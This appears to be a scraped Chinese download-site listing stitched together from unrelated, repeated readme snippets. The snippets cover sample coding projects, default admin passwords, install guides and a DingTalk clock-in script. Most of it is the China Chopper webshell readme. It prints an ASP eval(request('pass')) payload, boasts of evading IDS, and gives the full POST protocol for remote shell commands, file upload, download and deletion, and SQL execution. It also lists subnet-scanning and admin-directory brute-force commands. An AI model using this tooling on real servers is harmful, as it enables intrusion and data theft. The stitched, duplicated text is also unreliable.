第2章(\C02)示例描述:本章实现了电子通讯录系统,功能包括用户注册、用户登录、修改密码、添加好友、添加好友联系方式、修改好友联系方式、删除好友联系方式等。
\MyAddressList\DB\MyAddressList.sql 电子通讯录系统数据数据库创建脚本\MyAddressList\DB\MyAddressList.bak 电子通讯录系统数据数据库备份\MyAddressList\Images\ 电子通讯录系统图片文件夹\MyAddressList\Styles\Stye.css 电子通讯录系统样式表文件\MyAddressList\Login.aspx 登录页面\MyAddressList\Register.aspx 注册页面\MyAddressList\ModifyPwd.aspx 修改密码页面\MyAddressList\AddressAdd.aspx 添加好友页面\MyAddressList\AddressList.aspx 好友管理页面第3章(\C03)示例描述:本章实现了网上选课系统,通过该系统,学校不同角色的用户可以通过网路完成选课系统功能:管理员通过该系统实现对学生、教师、课程的添加和维护和学生成绩的维护;
教师通过该系统实现查看课程选修情况和录入学生成绩;
学生通过该系统实现选课、退课等功能;
还有公有模块:修改密码功能。
\MyElectCourse\DB\MyElectCourse.sql 网上选课系统数据数据库创建脚本\MyElectCourse\DB\MyElectCourse.bak 网上选课系统数据数据库备份\MyElectCourse\Images\ 网上选课系统图片文件夹\MyElectCourse\Controls\left.ascx 网上选课系统用户控件\MyElectCourse\Login.aspx 登录页面\MyElectCourse\Main.aspx 管理员主页面\MyElectCourse\adminStudentAdd.aspx 添加学生页面\MyElectCourse\adminStudentDetails.aspx 学生维护页面\MyElectCourse\adminCourse.aspx 添加课程页面\MyElectCourse\adminCourseDetails.aspx 课程维护页面\MyElectCourse\adminTeacherAdd.aspx 添加教师页面\MyElectCourse\adminTeacherDetails.aspx 教师维护页面\MyElectCourse\adminStudentScore.aspx 成绩维护页面\MyElectCourse\studentElect.aspx 学生选课页面\MyElectCourse\courseDetail.aspx 课程详细信息页面\MyElectCourse\teacherQueryElect.aspx 教师查询选课情况页面\MyElectCourse\teacherSubmitScore.aspx 教师提交成绩页面\MyElectCourse\ModifyPwd.aspx 修改密码页面第4章(\C04)示例描述:本章实现了聊天室系统,功能包括用户登录、自动注册、用户发言、实时浏览发言、注销身份等。
\MyChatRoom\App_Code\BusinessLogicLayer 聊天室业务逻辑层,包括以下文件: \Message.cs 用户留言类 \User.cs 用户类\MyChatRoom\App_Code\DataAccessLayer 聊天室数据访问层,包括以下文件: \Database.cs 数据访问类\MyChatRoom\DB\MyChatRoom.sql 聊天室数据数据库创建脚本\MyChatRoom\Images\ 聊天室系统图片文件夹
\MyAddressList\DB\MyAddressList.sql 电子通讯录系统数据数据库创建脚本\MyAddressList\DB\MyAddressList.bak 电子通讯录系统数据数据库备份\MyAddressList\Images\ 电子通讯录系统图片文件夹\MyAddressList\Styles\Stye.css 电子通讯录系统样式表文件\MyAddressList\Login.aspx 登录页面\MyAddressList\Register.aspx 注册页面\MyAddressList\ModifyPwd.aspx 修改密码页面\MyAddressList\AddressAdd.aspx 添加好友页面\MyAddressList\AddressList.aspx 好友管理页面第3章(\C03)示例描述:本章实现了网上选课系统,通过该系统,学校不同角色的用户可以通过网路完成选课系统功能:管理员通过该系统实现对学生、教师、课程的添加和维护和学生成绩的维护;
教师通过该系统实现查看课程选修情况和录入学生成绩;
学生通过该系统实现选课、退课等功能;
还有公有模块:修改密码功能。
\MyElectCourse\DB\MyElectCourse.sql 网上选课系统数据数据库创建脚本\MyElectCourse\DB\MyElectCourse.bak 网上选课系统数据数据库备份\MyElectCourse\Images\ 网上选课系统图片文件夹\MyElectCourse\Controls\left.ascx 网上选课系统用户控件\MyElectCourse\Login.aspx 登录页面\MyElectCourse\Main.aspx 管理员主页面\MyElectCourse\adminStudentAdd.aspx 添加学生页面\MyElectCourse\adminStudentDetails.aspx 学生维护页面\MyElectCourse\adminCourse.aspx 添加课程页面\MyElectCourse\adminCourseDetails.aspx 课程维护页面\MyElectCourse\adminTeacherAdd.aspx 添加教师页面\MyElectCourse\adminTeacherDetails.aspx 教师维护页面\MyElectCourse\adminStudentScore.aspx 成绩维护页面\MyElectCourse\studentElect.aspx 学生选课页面\MyElectCourse\courseDetail.aspx 课程详细信息页面\MyElectCourse\teacherQueryElect.aspx 教师查询选课情况页面\MyElectCourse\teacherSubmitScore.aspx 教师提交成绩页面\MyElectCourse\ModifyPwd.aspx 修改密码页面第4章(\C04)示例描述:本章实现了聊天室系统,功能包括用户登录、自动注册、用户发言、实时浏览发言、注销身份等。
\MyChatRoom\App_Code\BusinessLogicLayer 聊天室业务逻辑层,包括以下文件: \Message.cs 用户留言类 \User.cs 用户类\MyChatRoom\App_Code\DataAccessLayer 聊天室数据访问层,包括以下文件: \Database.cs 数据访问类\MyChatRoom\DB\MyChatRoom.sql 聊天室数据数据库创建脚本\MyChatRoom\Images\ 聊天室系统图片文件夹
2025/2/15 9:29:21
3.33MB
1
程序默认管理员账号:Admin密码:Password//区分大小写cards.txt是存储上网卡记录用的records.txt是存储上网记录用的初始都为空测试时需要先登陆管理员账号,添加一些学生后再进行其它操作listA;是用来创建一个类型为type的链表AA.push_back(t)是把变量t存入链表A.erase(t)是把变量t删除for(list::iteratorit=card_database.begin();it!=card_database.end();++it){}这段代码是对链表的遍历literator是迭代器,作用和for循环中的循环变量相同(如i,j)
2025/2/15 7:39:33
440KB
1
安装说明:1、上传到网站根目录2、用phpMyadmin导入数据库文件sasa.sql3、修改数据库链接文件application\config\database.php(记得不要用记事本修改,否则可能会出现验证码显示不了问题,建议用Notepad++)4、访问您网址帐号admin密码admin(记得用chrome浏览器,用IE会有不兼容情况)
42.07MB
1
oracleocp官方原版培训教材pdfD49994GC10!
2025/1/6 21:10:21
3.78MB
1
增值税开票模拟系统(5.02版本)1、由于增值税防伪税控系统从6.0版本开始不再提供模拟开票功能,所以想学习开票操作的朋友,只能使用此版本的软件来做基本的模拟练习操作,虽然版本不同,不过基本的主要操作没有太大变化;
2、本处提供的开票软件,不是所谓的破解版或试用版,航天税控开票系统在此版本的软件设计就已为方便大家学习有专设此模拟开票功能,只是不知为何以后的版本不再提供这类的功能了;
安装操作简单介绍如下:第一步:首先运行本软件内的setup.exe程序,安装时提示,"是否要重启",点击"不需要重启",完成,再次运行安装程序。
接下来的就是下一步,下一步的了。
最后安装完了,提示是否要重启,还是不需要重启的。
第二步:在本软件内有一个目录“相关文档”.将这个目录的所有文件拷贝到"C:\ProgramFiles\航天信息\防伪开票\DATABASE\SYSTEM\SUIT"这个目录下(假设你安装时是安装在默认的C盘),用覆盖的形式,注意拷贝完后,如果发现这三个文件的文件属性为“只读”,则请修改清除其只读属性,否则后面进入软件操作时会出现英文提示,只读文件不可操作的内容。
到止软件模拟安装算是完成了。
第三步:运行“C:\ProgramFiles\航天信息\防伪开票\Bin\SimuTax.exe”这个文件。
选择菜单“发行系统”=>“发行金税卡”,弹出窗口,你就在“企业名称”栏中随便填点吧。
然后点击“发行”=》“退出”第四步:还是选择菜单“发售系统”=>“发票发售”,在弹出的窗口中将“发票起始号”填满,随你填啦(要求是数字),然后点击“发售”,成功了就可以退出这个软件了。
第五步:还是回到桌面的“防伪开票”,双击进去。
弹出的窗口上选择“进入系统”,这时出现操作员登陆窗口,在操作员列表上选择“管理员”,没有口今,就直接点击“确定”,这时系统提示“相差一个月”什么的,不要去管它,”确定“就是了。
第六步:到了此时,你已经进入了航天的开票系统中了,但是还有东西要做的,请耐心点吧。
这个时候看见了“初始化起”没有(如果没有看见的话,可以点击一下工具条上的“系统设置”),这时的初始化起是有颜色的,如果没有颜色的话,你登陆的时候操作员就选错了,不是选择的是管理员,请重新登陆吧,如果是这样的话,就请自己研究吧,谁叫你不跟着我操作。
有颜色的话,就点击一下“初始化起”吧,在弹出的窗口上单击一下“确认”,系统重建完表后,就会提示初始化成功的了,初台化成功后,再点一下工具条上的“系统设置”(这个按钮在菜单下一点点,如果你都看不见的话,我建议你不要玩这个了),然后在弹出的对话框中,选择一下“初始化终”,点击一下“确认”,到了这一步,所有的初始化完成了,第七步:点一下工具条上的“发票管理“=》"发票读入"=》“确认”。
最后提示成功读入。
第八步:你的所有工作已经完成了,这一下,你可以测试自己开票了。
点一下“发票填开”,下面的开票操作我就不教了,所以不是模拟设置的内容了,自己发挥吧。
2、本处提供的开票软件,不是所谓的破解版或试用版,航天税控开票系统在此版本的软件设计就已为方便大家学习有专设此模拟开票功能,只是不知为何以后的版本不再提供这类的功能了;
安装操作简单介绍如下:第一步:首先运行本软件内的setup.exe程序,安装时提示,"是否要重启",点击"不需要重启",完成,再次运行安装程序。
接下来的就是下一步,下一步的了。
最后安装完了,提示是否要重启,还是不需要重启的。
第二步:在本软件内有一个目录“相关文档”.将这个目录的所有文件拷贝到"C:\ProgramFiles\航天信息\防伪开票\DATABASE\SYSTEM\SUIT"这个目录下(假设你安装时是安装在默认的C盘),用覆盖的形式,注意拷贝完后,如果发现这三个文件的文件属性为“只读”,则请修改清除其只读属性,否则后面进入软件操作时会出现英文提示,只读文件不可操作的内容。
到止软件模拟安装算是完成了。
第三步:运行“C:\ProgramFiles\航天信息\防伪开票\Bin\SimuTax.exe”这个文件。
选择菜单“发行系统”=>“发行金税卡”,弹出窗口,你就在“企业名称”栏中随便填点吧。
然后点击“发行”=》“退出”第四步:还是选择菜单“发售系统”=>“发票发售”,在弹出的窗口中将“发票起始号”填满,随你填啦(要求是数字),然后点击“发售”,成功了就可以退出这个软件了。
第五步:还是回到桌面的“防伪开票”,双击进去。
弹出的窗口上选择“进入系统”,这时出现操作员登陆窗口,在操作员列表上选择“管理员”,没有口今,就直接点击“确定”,这时系统提示“相差一个月”什么的,不要去管它,”确定“就是了。
第六步:到了此时,你已经进入了航天的开票系统中了,但是还有东西要做的,请耐心点吧。
这个时候看见了“初始化起”没有(如果没有看见的话,可以点击一下工具条上的“系统设置”),这时的初始化起是有颜色的,如果没有颜色的话,你登陆的时候操作员就选错了,不是选择的是管理员,请重新登陆吧,如果是这样的话,就请自己研究吧,谁叫你不跟着我操作。
有颜色的话,就点击一下“初始化起”吧,在弹出的窗口上单击一下“确认”,系统重建完表后,就会提示初始化成功的了,初台化成功后,再点一下工具条上的“系统设置”(这个按钮在菜单下一点点,如果你都看不见的话,我建议你不要玩这个了),然后在弹出的对话框中,选择一下“初始化终”,点击一下“确认”,到了这一步,所有的初始化完成了,第七步:点一下工具条上的“发票管理“=》"发票读入"=》“确认”。
最后提示成功读入。
第八步:你的所有工作已经完成了,这一下,你可以测试自己开票了。
点一下“发票填开”,下面的开票操作我就不教了,所以不是模拟设置的内容了,自己发挥吧。
2024/12/20 17:18:29
21.41MB
1
修改application这个目录下的database.php这个数据库导入xjy.sql这个数据coller.html开启K线..请不要关闭请在fastpay文件夹里面修改你的appkey跟秘钥亲测行情和界面都很新颖,还有很大升级空间你的域名admin/login/login.html后台地址...账号admin密码123456如果密码不对..请在数据库修改
40.87MB
1
产品名称:中国菜刀(Chinachopper)生产厂家:中国菜刀贸易有限公司厂家地址:http://www.maicaidao.com/----------------------------------------------------------------------------------------------------------免责申明: 请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任!----------------------------------------------------------------------------------------------------------友情提示:程序在使用过程中难免有各种BUG,到官网看一下是否有更新吧,说不定己经修补了呢。
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分 1)要了解的 服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下: PHP: ASP: ASP.NET: (注意:ASP.NET要单独一个文件或此文件也是Jscript语言) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
2)怎么用 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理三大块功能,同时支持自定义的脚本执行,并可以导入导出数据。
要是其它都没错误,那么可能就是你把语言编码选错了。
1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法) 3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以及支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 注意:由于服务器的安全设置,某些功能可能不能正常使用。
3)关于配置信息怎么填? A)数据库方面: PHP脚本: 类型类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址主机地址可为机器名或IP地址,如localhost 数据库用户连接数据库的用户名,如root 数据库密码连接数据库的密码,如123455 ASP和ASP.NET脚本: 类型类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。
如MSSQL的配置信息为 Driver={SqlServer};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize脚本: 类型类型只能填XDB 与Customize脚本约定的配置信息 菜刀自带的server.jsp数据库参数填写方法如下(两行): MSSQL:com.microsoft.sqlserver.jdbc.SQLServerDriverjdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL:com.mysql.jdbc.Driverjdbc:mysql://localhost/test?user=root&password=123456 ORACLE:oracle.jdbc.driver.OracleDriverjdbc:oracle:thin:user/password@127.0.0.1:1521/test B)其它方面: 添加额外附加提交的数据,如ASP的新服务端是这样的: 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
https://target.com/cgi-bin/login.cgi uid=user1&pwd=123456 3)关于HTTP登录验证 SHELL地址这样填http://user:pass@server/server.asp 用户名密码中的特殊字符可用URL编码转换。
二、安全扫描 蜘蛛爬行,绑定域名查询,目录爆破。
命令解释: A)查单一IP的绑定域名 {reverse_ip}{url:http://www.test.com/} B)扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c}{url:http://www.test.com/} C)只扫描本C段开放的WEB服务器 {reverse_ip_c}{url:http://www.test.com/}{port} D)蜘蛛爬行 {spider}{url:http://www.test.com/} E)蜘蛛爬行,并设定爬行范围 {spider}{url:http://www.test.com/}{range:test.com} F)蜘蛛爬行,过滤重复URL加快速度 加上{filter} G)爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack}{url:http://%s/admin/}{flag:HTTP/1.1200}{dict:list.txt} {crack}{url:http://%s/admin/}{flag:!!HTTP/1.1404}{dict:list.txt} {crack}{url:http://www.test.com/%s/}{flag:successfully}{dict:list.txt}三、定时提醒 当闹钟来用吧,周期:每月/每周/每日/只一次。
四、快速启动 一些常用的快捷方式放在这里,可以指定用户身份运行程序。
这部分数据是加密存储的。
五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
六、其它部分 等待加入。
文件说明:------------------------------------------------------------------chopper.exe 菜刀程序db.mdb 菜刀的主数据库------------------------------------------------------------------cache.tmp 菜刀的缓存数据库(可删除)readme.txt 你现在正在看的(可删除)[目录]Script 存放菜刀的自写脚本和Customize模式Jsp的一个服务端文件(可删除)----附---------------------------Customize模式菜刀和服务端通信接口---------------------------------------------------------------------------------------------------其它语言的服务端代码可按此接口来编写(请参照server.jsp/server.cfm)---------------------例:菜刀客户端填写的密码为pass,网页编码选的是GB2312注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记注:返回的错误信息开头包含ERROR://注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
--------------------------------------------------------------------------------------------------------------------------------------------------------[得到当前目录的绝对路径]提交:pass=A&z0=GB2312返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表示例:c:\inetpub\wwwroot\ C:D:E:K:示例:/var/www/html/ [目录浏览]提交:pass=B&z0=GB2312&z1=目录绝对路径返回:先目录后文件,目录名后要加/,文件名后不要加/示例: 目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n 文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n[读取文本文件]提交:pass=C&z0=GB2312&z1=文件绝对路径返回:文本文件的内容[写入文本文件]提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容返回:成功返回1,不成功返回错误信息[删除文件或目录]提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径返回:成功返回1,不成功返回错误信息[下载文件]提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径返回:要下载文件的内容[上传文件]提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)返回:要下载文件的内容[复制文件或目录后粘贴]提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径返回:成功返回1,不成功返回错误信息[文件或目录重命名]提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)返回:成功返回1,不成功返回错误信息[新建目录]提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)返回:成功返回1,不成功返回错误信息[修改文件或目录时间]提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-ddHH:mm:ss)返回:成功返回1,不成功返回错误信息[下载文件到服务器]提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径返回:成功返回1,不成功返回错误信息[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令返回:命令执行结果[得到数据库基本信息]提交:pass=N&z0=GB2312&z1=数据库配置信息返回:成功返回数据库(以制表符\t分隔),不成功返回错误信息[获取数据库表名]提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名返回:成功返回数据表(以\t分隔),不成功返回错误信息[获取数据表列名]提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名返回:成功返回数据列(以制表符\t分隔),不成功返回错误信息[执行数据库命令]提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令返回:成功返回数据表内容,不成功返回错误信息注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。
行中的每列后加上\t|\t标记,每行以标记\r\n为结束
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分 1)要了解的 服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下: PHP: ASP: ASP.NET: (注意:ASP.NET要单独一个文件或此文件也是Jscript语言) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
2)怎么用 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理三大块功能,同时支持自定义的脚本执行,并可以导入导出数据。
要是其它都没错误,那么可能就是你把语言编码选错了。
1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法) 3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以及支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 注意:由于服务器的安全设置,某些功能可能不能正常使用。
3)关于配置信息怎么填? A)数据库方面: PHP脚本: 类型类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址主机地址可为机器名或IP地址,如localhost 数据库用户连接数据库的用户名,如root 数据库密码连接数据库的密码,如123455 ASP和ASP.NET脚本: 类型类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。
如MSSQL的配置信息为 Driver={SqlServer};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize脚本: 类型类型只能填XDB 与Customize脚本约定的配置信息 菜刀自带的server.jsp数据库参数填写方法如下(两行): MSSQL:com.microsoft.sqlserver.jdbc.SQLServerDriverjdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL:com.mysql.jdbc.Driverjdbc:mysql://localhost/test?user=root&password=123456 ORACLE:oracle.jdbc.driver.OracleDriverjdbc:oracle:thin:user/password@127.0.0.1:1521/test B)其它方面: 添加额外附加提交的数据,如ASP的新服务端是这样的: 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
https://target.com/cgi-bin/login.cgi uid=user1&pwd=123456 3)关于HTTP登录验证 SHELL地址这样填http://user:pass@server/server.asp 用户名密码中的特殊字符可用URL编码转换。
二、安全扫描 蜘蛛爬行,绑定域名查询,目录爆破。
命令解释: A)查单一IP的绑定域名 {reverse_ip}{url:http://www.test.com/} B)扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c}{url:http://www.test.com/} C)只扫描本C段开放的WEB服务器 {reverse_ip_c}{url:http://www.test.com/}{port} D)蜘蛛爬行 {spider}{url:http://www.test.com/} E)蜘蛛爬行,并设定爬行范围 {spider}{url:http://www.test.com/}{range:test.com} F)蜘蛛爬行,过滤重复URL加快速度 加上{filter} G)爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack}{url:http://%s/admin/}{flag:HTTP/1.1200}{dict:list.txt} {crack}{url:http://%s/admin/}{flag:!!HTTP/1.1404}{dict:list.txt} {crack}{url:http://www.test.com/%s/}{flag:successfully}{dict:list.txt}三、定时提醒 当闹钟来用吧,周期:每月/每周/每日/只一次。
四、快速启动 一些常用的快捷方式放在这里,可以指定用户身份运行程序。
这部分数据是加密存储的。
五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
六、其它部分 等待加入。
文件说明:------------------------------------------------------------------chopper.exe 菜刀程序db.mdb 菜刀的主数据库------------------------------------------------------------------cache.tmp 菜刀的缓存数据库(可删除)readme.txt 你现在正在看的(可删除)[目录]Script 存放菜刀的自写脚本和Customize模式Jsp的一个服务端文件(可删除)----附---------------------------Customize模式菜刀和服务端通信接口---------------------------------------------------------------------------------------------------其它语言的服务端代码可按此接口来编写(请参照server.jsp/server.cfm)---------------------例:菜刀客户端填写的密码为pass,网页编码选的是GB2312注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记注:返回的错误信息开头包含ERROR://注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
--------------------------------------------------------------------------------------------------------------------------------------------------------[得到当前目录的绝对路径]提交:pass=A&z0=GB2312返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表示例:c:\inetpub\wwwroot\ C:D:E:K:示例:/var/www/html/ [目录浏览]提交:pass=B&z0=GB2312&z1=目录绝对路径返回:先目录后文件,目录名后要加/,文件名后不要加/示例: 目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n 文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n[读取文本文件]提交:pass=C&z0=GB2312&z1=文件绝对路径返回:文本文件的内容[写入文本文件]提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容返回:成功返回1,不成功返回错误信息[删除文件或目录]提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径返回:成功返回1,不成功返回错误信息[下载文件]提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径返回:要下载文件的内容[上传文件]提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)返回:要下载文件的内容[复制文件或目录后粘贴]提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径返回:成功返回1,不成功返回错误信息[文件或目录重命名]提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)返回:成功返回1,不成功返回错误信息[新建目录]提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)返回:成功返回1,不成功返回错误信息[修改文件或目录时间]提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-ddHH:mm:ss)返回:成功返回1,不成功返回错误信息[下载文件到服务器]提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径返回:成功返回1,不成功返回错误信息[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令返回:命令执行结果[得到数据库基本信息]提交:pass=N&z0=GB2312&z1=数据库配置信息返回:成功返回数据库(以制表符\t分隔),不成功返回错误信息[获取数据库表名]提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名返回:成功返回数据表(以\t分隔),不成功返回错误信息[获取数据表列名]提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名返回:成功返回数据列(以制表符\t分隔),不成功返回错误信息[执行数据库命令]提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令返回:成功返回数据表内容,不成功返回错误信息注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。
行中的每列后加上\t|\t标记,每行以标记\r\n为结束
2024/10/23 12:54:30
197KB
1
这是网盘链接以及提取码,链接长期有效。
1本书附带光盘内容包括本书源程序和部分实例的教学录像、自主学习系统等。
如何使用本书源程序1.开发及运行环境本书源程序都是在Windows7下开发的,程序测试环境为WindowsServer2003。
用户只有在Windows7或WindowsServer2003下正确配置程序所需的运行环境后,才可以使用本书中的源程序。
软件开发平台如下:操作系统:WindowsServer2003或Windows7数据库:SQLServer2008开发环境:MicrosoftVisualStudio2012程序运行环境:.NETFramework4.52.源程序使用方法(1)使用本书中的源程序时,请将源程序文件夹下的所有文件拷贝到计算机硬盘上,并去掉所有文件的只读属性。
(2)在系统上安装VisualStudio2012集成开发环境和SQLServer2008数据库。
(3)数据库文件存储于MR文件夹下的Database文件夹中。
(4)本书使用的是SQLServer2008数据库。
数据库的附加方法请参见下一节。
1本书附带光盘内容包括本书源程序和部分实例的教学录像、自主学习系统等。
如何使用本书源程序1.开发及运行环境本书源程序都是在Windows7下开发的,程序测试环境为WindowsServer2003。
用户只有在Windows7或WindowsServer2003下正确配置程序所需的运行环境后,才可以使用本书中的源程序。
软件开发平台如下:操作系统:WindowsServer2003或Windows7数据库:SQLServer2008开发环境:MicrosoftVisualStudio2012程序运行环境:.NETFramework4.52.源程序使用方法(1)使用本书中的源程序时,请将源程序文件夹下的所有文件拷贝到计算机硬盘上,并去掉所有文件的只读属性。
(2)在系统上安装VisualStudio2012集成开发环境和SQLServer2008数据库。
(3)数据库文件存储于MR文件夹下的Database文件夹中。
(4)本书使用的是SQLServer2008数据库。
数据库的附加方法请参见下一节。
2024/10/23 2:13:17
67B
1
linux.x64_11gR2_database_1of2.ziplinux.x64_11gR2_database_2of2.zip
2024/9/27 11:44:01
78B
1
要求具备基本功能如下:(1)能够对角色信息进行添加、修改、删除、浏览等操作;
(2)能够对权限信息进行添加、删除、修改和查询;
(3)实现对角色的权限分配与管理;
(4)系统操作简单,方便实用。
数据库在database文件夹中!
(2)能够对权限信息进行添加、删除、修改和查询;
(3)实现对角色的权限分配与管理;
(4)系统操作简单,方便实用。
数据库在database文件夹中!
2024/8/31 17:05:08
2.33MB
1
在日常工作中,钉钉打卡成了我生活中不可或缺的一部分。然而,有时候这个看似简单的任务却给我带来了不少烦恼。
每天早晚,我总是得牢记打开钉钉应用,点击"工作台",再找到"考勤打卡"进行签到。有时候因为工作忙碌,会忘记打卡,导致考勤异常,影响当月的工作评价。而且,由于我使用的是苹果手机,有时候系统更新后,钉钉的某些功能会出现异常,使得打卡变得更加麻烦。
另外,我的家人使用的是安卓手机,他们也经常抱怨钉钉打卡的繁琐。尤其是对于那些不太熟悉手机操作的长辈来说,每次打卡都是一次挑战。他们总是担心自己会操作失误,导致打卡失败。
为了解决这些烦恼,我开始思考是否可以通过编写一个全自动化脚本来实现钉钉打卡。经过一段时间的摸索和学习,我终于成功编写出了一个适用于苹果和安卓系统的钉钉打卡脚本。
2024-04-09 15:03
15KB